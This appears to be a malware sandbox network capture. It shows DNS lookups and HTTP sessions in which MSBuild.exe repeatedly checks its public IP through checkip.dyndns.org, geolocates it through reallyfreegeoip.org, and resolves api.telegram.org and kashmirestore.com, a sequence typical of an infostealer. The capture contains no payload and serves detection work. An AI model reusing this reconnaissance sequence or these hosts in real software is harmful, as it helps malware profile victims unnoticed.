Dec 14, 2024 13:50:06.783317089 CET | 192.168.2.6 | 1.1.1.1 | 0x179b | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:50:10.816241980 CET | 192.168.2.6 | 1.1.1.1 | 0x837a | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:50:18.197474003 CET | 192.168.2.6 | 1.1.1.1 | 0x87f1 | Standard query (0) | kashmirestore.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 14, 2024 13:49:36.224576950 CET | 1.1.1.1 | 192.168.2.6 | 0xbb37 | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 14, 2024 13:49:36.224576950 CET | 1.1.1.1 | 192.168.2.6 | 0xbb37 | No error (0) | checkip.dyndns.com |  | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:49:36.224576950 CET | 1.1.1.1 | 192.168.2.6 | 0xbb37 | No error (0) | checkip.dyndns.com |  | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:49:36.224576950 CET | 1.1.1.1 | 192.168.2.6 | 0xbb37 | No error (0) | checkip.dyndns.com |  | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:49:36.224576950 CET | 1.1.1.1 | 192.168.2.6 | 0xbb37 | No error (0) | checkip.dyndns.com |  | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:49:36.224576950 CET | 1.1.1.1 | 192.168.2.6 | 0xbb37 | No error (0) | checkip.dyndns.com |  | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:49:38.469408035 CET | 1.1.1.1 | 192.168.2.6 | 0x86e3 | No error (0) | reallyfreegeoip.org |  | 172.67.177.134 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:49:38.469408035 CET | 1.1.1.1 | 192.168.2.6 | 0x86e3 | No error (0) | reallyfreegeoip.org |  | 104.21.67.152 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:49:42.437077999 CET | 1.1.1.1 | 192.168.2.6 | 0x74d9 | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 14, 2024 13:49:42.437077999 CET | 1.1.1.1 | 192.168.2.6 | 0x74d9 | No error (0) | checkip.dyndns.com |  | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:49:42.437077999 CET | 1.1.1.1 | 192.168.2.6 | 0x74d9 | No error (0) | checkip.dyndns.com |  | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:49:42.437077999 CET | 1.1.1.1 | 192.168.2.6 | 0x74d9 | No error (0) | checkip.dyndns.com |  | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:49:42.437077999 CET | 1.1.1.1 | 192.168.2.6 | 0x74d9 | No error (0) | checkip.dyndns.com |  | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:49:42.437077999 CET | 1.1.1.1 | 192.168.2.6 | 0x74d9 | No error (0) | checkip.dyndns.com |  | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:49:44.302066088 CET | 1.1.1.1 | 192.168.2.6 | 0x66f1 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:49:44.302066088 CET | 1.1.1.1 | 192.168.2.6 | 0x66f1 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:49:45.989290953 CET | 1.1.1.1 | 192.168.2.6 | 0xb400 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 14, 2024 13:49:45.989290953 CET | 1.1.1.1 | 192.168.2.6 | 0xb400 | No error (0) | fp2e7a.wpc.phicdn.net |  | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:50:06.920958042 CET | 1.1.1.1 | 192.168.2.6 | 0x179b | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 14, 2024 13:50:06.920958042 CET | 1.1.1.1 | 192.168.2.6 | 0x179b | No error (0) | checkip.dyndns.com |  | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:50:06.920958042 CET | 1.1.1.1 | 192.168.2.6 | 0x179b | No error (0) | checkip.dyndns.com |  | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:50:06.920958042 CET | 1.1.1.1 | 192.168.2.6 | 0x179b | No error (0) | checkip.dyndns.com |  | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:50:06.920958042 CET | 1.1.1.1 | 192.168.2.6 | 0x179b | No error (0) | checkip.dyndns.com |  | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:50:06.920958042 CET | 1.1.1.1 | 192.168.2.6 | 0x179b | No error (0) | checkip.dyndns.com |  | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:50:10.953824997 CET | 1.1.1.1 | 192.168.2.6 | 0x837a | No error (0) | api.telegram.org |  | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:50:18.946362972 CET | 1.1.1.1 | 192.168.2.6 | 0x87f1 | No error (0) | kashmirestore.com |  | 119.18.54.39 | A (IP address) | IN (0x0001) | false
                                                                                                                            • reallyfreegeoip.org
                                                                                                                            • api.telegram.org
                                                                                                                            • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49719 | 158.101.44.242 | 80 | 7252 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:49:36.361257076 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
Dec 14, 2024 13:49:37.567213058 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:37 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 43db8d738f85099c11fec4e2458b9065
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 14, 2024 13:49:37.580169916 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
Dec 14, 2024 13:49:37.955250025 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:37 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: f8be8b6efacb699b65355ac5b401d17f
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 14, 2024 13:49:40.240894079 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
Dec 14, 2024 13:49:40.614959002 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:40 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 91d195408e7ae871bfebc16f073d4772
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49724 | 193.122.6.168 | 80 | 7252 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:49:42.558427095 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
Dec 14, 2024 13:49:44.061372995 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:43 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 6aac2b039c1129c97eb60100502e63fe
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                            Dec 14, 2024 13:49:44.206047058 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:43 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 6aac2b039c1129c97eb60100502e63fe
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            2 | 192.168.2.6 | 49728 | 193.122.6.168 | 80 | 7252 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            Dec 14, 2024 13:49:45.855396032 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 14, 2024 13:49:47.121812105 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:46 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: c9e1a81dc6895e7301d78cb8daf10ac4
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            3 | 192.168.2.6 | 49731 | 193.122.6.168 | 80 | 7704 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            Dec 14, 2024 13:49:47.938636065 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 14, 2024 13:49:49.209090948 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:49 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: ea33582956fe39a8962f3b4afb72ff3e
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                            Dec 14, 2024 13:49:49.212517023 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Dec 14, 2024 13:49:49.619646072 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:49 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: d6a9455bd1f2d41059462e2dacc999b3
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                            Dec 14, 2024 13:49:51.326878071 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Dec 14, 2024 13:49:51.734481096 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:51 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 4152cb77e6e2783429c5c4ae319ebf74
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            4 | 192.168.2.6 | 49733 | 193.122.6.168 | 80 | 7252 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            Dec 14, 2024 13:49:48.932734013 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 14, 2024 13:49:50.199438095 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:50 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: ef77f7d22b53accff2f961fd970c8e1b
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            5 | 192.168.2.6 | 49737 | 193.122.6.168 | 80 | 7252 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            Dec 14, 2024 13:49:51.993699074 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 14, 2024 13:49:53.282005072 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:53 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: b635cd16f99c5362010150a8c318bca6
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            6 | 192.168.2.6 | 49740 | 193.122.6.168 | 80 | 7704 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            Dec 14, 2024 13:49:53.534574986 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Dec 14, 2024 13:49:54.991236925 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:54 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 72adf531cb404e9395e443c2e063b127
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            7 | 192.168.2.6 | 49741 | 193.122.6.168 | 80 | 7252 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            Dec 14, 2024 13:49:55.082681894 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 14, 2024 13:49:56.351850033 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:56 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 26c21a1d4fe88fb8f0c2d88305b546b5
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            8 | 192.168.2.6 | 49744 | 193.122.6.168 | 80 | 7704 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            Dec 14, 2024 13:49:56.811084032 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 14, 2024 13:49:58.328589916 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:58 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 8988aa3926c02327362e75059d6c8c91
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            9 | 192.168.2.6 | 49746 | 193.122.6.168 | 80 | 7252 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            Dec 14, 2024 13:49:58.234639883 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 14, 2024 13:49:59.510355949 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:59 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: e35402f92ed500e0559479913cc60d45
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 49749 | 193.122.6.168 | 80 | 7704 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:50:00.122747898 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
Dec 14, 2024 13:50:05.112823009 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:04 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 6ac4e8d7e901e636a5d3e335cb3153c5
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 49750 | 193.122.6.168 | 80 | 7252 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:50:01.299500942 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
Dec 14, 2024 13:50:09.118654966 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:08 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 581cf8521b9cc737d84ff20024147f43
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 49753 | 132.226.247.73 | 80 | 7704 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:50:07.045927048 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
Dec 14, 2024 13:50:17.287951946 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:17 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 3006336f35ffbf79b9f5d7ab00479c2e
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 49759 | 132.226.247.73 | 80 | 7704 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:50:19.089621067 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
Dec 14, 2024 13:50:22.347810984 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:22 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 7d5d263a8b663d8a5f74a6fc8425581a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 49764 | 132.226.247.73 | 80 | 7704 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:50:24.314376116 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
Dec 14, 2024 13:50:25.618638039 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:25 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 6d77ce9d29071eb2514e720ddb20ff03
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 49766 | 132.226.247.73 | 80 | 7704 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:50:27.426146030 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
Dec 14, 2024 13:50:28.729875088 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:28 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: bc6542e5d34b53f9de50bf3cc8bbad93
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49720 | 172.67.177.134 | 443 | 7252 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 12:49:39 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                            Connection: Keep-Alive
2024-12-14 12:49:40 UTC | 890 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:40 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169349
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8c91Dt5xMf5%2BE6JKVVejbKsJMNI2RSTJR%2FJuZhu7EJLhUiSZ73%2B7y7rN%2FZsi3B6muOgCEMF0fOp%2BVegVP%2Fj1cPTB1F%2Fa%2Bps4wAkl2vCwDd7LGthnDxOW%2FGqkqRxY%2F5LqCDwBFJGg"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e50b15c00426a-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1709&min_rtt=1709&rtt_var=641&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1707602&cwnd=223&unsent_bytes=0&cid=842dfbd479ed1e79&ts=540&x=0"
2024-12-14 12:49:40 UTC | 362 | IN
                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49722 | 172.67.177.134 | 443 | 7252 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
